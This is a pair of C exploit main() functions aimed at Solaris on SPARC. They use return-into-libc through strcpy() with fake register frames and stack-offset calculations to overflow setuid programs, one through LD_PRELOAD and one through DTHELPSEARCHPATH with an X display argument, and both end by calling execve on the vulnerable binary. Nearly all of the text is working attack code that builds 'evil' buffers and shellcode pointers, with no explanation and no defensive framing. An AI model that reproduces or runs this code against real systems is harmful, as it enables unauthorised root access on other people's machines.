/* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], ff[FFSIZE]; char platform[256], release[256]; int i, offset, ff_addr, sc_addr, str_addr; int plat_len, prog_len, rel; char *arg[2] = {"foo", NULL}; int arg_len = 4, arg_pos = 1; int sb = ((int)argv[0] | 0xffff) & 0xfffffffc; int ret = search_ldso("strcpy"); int rwx_mem = search_rwx_mem(); /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* get some system information */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); rel = atoi(release + 2); /* prepare the evil buffer */ memset(buf, 'A', sizeof(buf)); buf[sizeof(buf) - 1] = 0x0; memcpy(buf, "LD_PRELOAD=/", 12); buf[sizeof(buf) - 2] = '/'; /* prepare the fake frame */ bzero(ff, sizeof(ff)); /* * saved %l registers */ set_val(ff, i = 0, DUMMY); /* %l0 */ set_val(ff, i += 4, DUMMY); /* %l1 */ set_val(ff, i += 4, DUMMY); /* %l2 */ set_val(ff, i += 4, DUMMY); /* %l3 */ set_val(ff, i += 4, DUMMY); /* %l4 */ set_val(ff, i += 4, DUMMY); /* %l5 */ set_val(ff, i += 4, DUMMY); /* %l6 */ set_val(ff, i += 4, DUMMY); /* %l7 */ /* * saved %i registers */ set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */ set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */ set_val(ff, i += 4, DUMMY); /* %i2 */ set_val(ff, i += 4, DUMMY); /* %i3 */ set_val(ff, i += 4, DUMMY); /* %i4 */ set_val(ff, i += 4, DUMMY); /* %i5 */ set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */ set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */ /* fill the envp, keeping padding */ sc_addr = add_env(ff); str_addr = add_env(sc); add_env("bar"); add_env(buf); add_env(NULL); /* calculate the offset to argv[0] (voodoo magic) */ plat_len = strlen(platform) + 1; prog_len = strlen(VULN) + 1; offset = arg_len + env_len + plat_len + prog_len; if (rel > 7) VOODOO64(offset, arg_pos, env_pos) else VOODOO32(offset, plat_len, prog_len) /* calculate the needed addresses */ ff_addr = sb - offset + arg_len; sc_addr += ff_addr; str_addr += ff_addr; /* set fake frame's %i1 */ set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */ /* fill the evil buffer */ for (i = 12 + ALIGN; i < 1296; i += 4) set_val(buf, i, str_addr); /* must be a valid string */ /* to avoid distance bruteforcing */ for (i = 1296 + ALIGN; i < BUFSIZE - 12; i += 4) { set_val(buf, i, ff_addr); set_val(buf, i += 4, ret - 4); /* strcpy(), after the save */ } /* print some output */ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using string address\t: 0x%p\n", (void *)str_addr); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr); fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); /* run the vulnerable program */ execve(VULN, arg, env); perror("execve"); exit(0); }
/* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE], ff[FFSIZE]; char platform[256], release[256], display[256]; int i, offset, ff_addr, sc_addr, var1_addr, var2_addr; int plat_len, prog_len, rel; char *arg[2] = {"foo", NULL}; int arg_len = 4, arg_pos = 1; int sb = ((int)argv[0] | 0xffff) & 0xfffffffc; int ret = search_ldso("strcpy"); /* or sprintf */ int rwx_mem = search_rwx_mem(); /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* read command line */ if (argc != 2) { fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); exit(1); } sprintf(display, "DISPLAY=%s", argv[1]); /* get some system information */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); rel = atoi(release + 2); /* prepare the evil buffer */ memset(buf, 'A', sizeof(buf)); buf[sizeof(buf) - 1] = 0x0; memcpy(buf, "DTHELPSEARCHPATH=", 17); /* prepare the evil env vars */ memset(var1, 'B', sizeof(var1)); var1[sizeof(var1) - 1] = 0x0; memset(var2, 'C', sizeof(var2)); var2[sizeof(var2) - 1] = 0x0; /* prepare the fake frame */ bzero(ff, sizeof(ff)); /* * saved %l registers */ set_val(ff, i = 0, DUMMY); /* %l0 */ set_val(ff, i += 4, DUMMY); /* %l1 */ set_val(ff, i += 4, DUMMY); /* %l2 */ set_val(ff, i += 4, DUMMY); /* %l3 */ set_val(ff, i += 4, DUMMY); /* %l4 */ set_val(ff, i += 4, DUMMY); /* %l5 */ set_val(ff, i += 4, DUMMY); /* %l6 */ set_val(ff, i += 4, DUMMY); /* %l7 */ /* * saved %i registers */ set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */ set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */ set_val(ff, i += 4, DUMMY); /* %i2 */ set_val(ff, i += 4, DUMMY); /* %i3 */ set_val(ff, i += 4, DUMMY); /* %i4 */ set_val(ff, i += 4, DUMMY); /* %i5 */ set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */ set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */ /* fill the envp, keeping padding */ sc_addr = add_env(ff); var1_addr = add_env(sc); var2_addr = add_env(var1); add_env(var2); add_env(display); add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin"); add_env("HOME=/tmp"); add_env(buf); add_env(NULL); /* calculate the offset to argv[0] (voodoo magic) */ plat_len = strlen(platform) + 1; prog_len = strlen(VULN) + 1; offset = arg_len + env_len + plat_len + prog_len; if (rel > 7) VOODOO64(offset, arg_pos, env_pos) else VOODOO32(offset, plat_len, prog_len) /* calculate the needed addresses */ ff_addr = sb - offset + arg_len; sc_addr += ff_addr; var1_addr += ff_addr; var2_addr += ff_addr; /* set fake frame's %i1 */ set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */ /* fill the evil buffer */ for (i = 17; i < BUFSIZE - 76; i += 4) set_val(buf, i, var1_addr - 5000); /* apparently, we don't need to bruteforce */ set_val(buf, i, ff_addr); set_val(buf, i += 4, ret - 4); /* strcpy(), after the save */ /* fill the evil env vars */ for (i = 0; i < VARSIZE - 8; i += 4) set_val(var1, i, var2_addr - 500); for (i = 0; i < VARSIZE - 8; i += 4) set_val(var2, i, ret - 8); /* ret, before strcpy() */ /* print some output */ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr); fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr); fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); /* run the vulnerable program */ execve(VULN, arg, env); perror("execve"); exit(0); }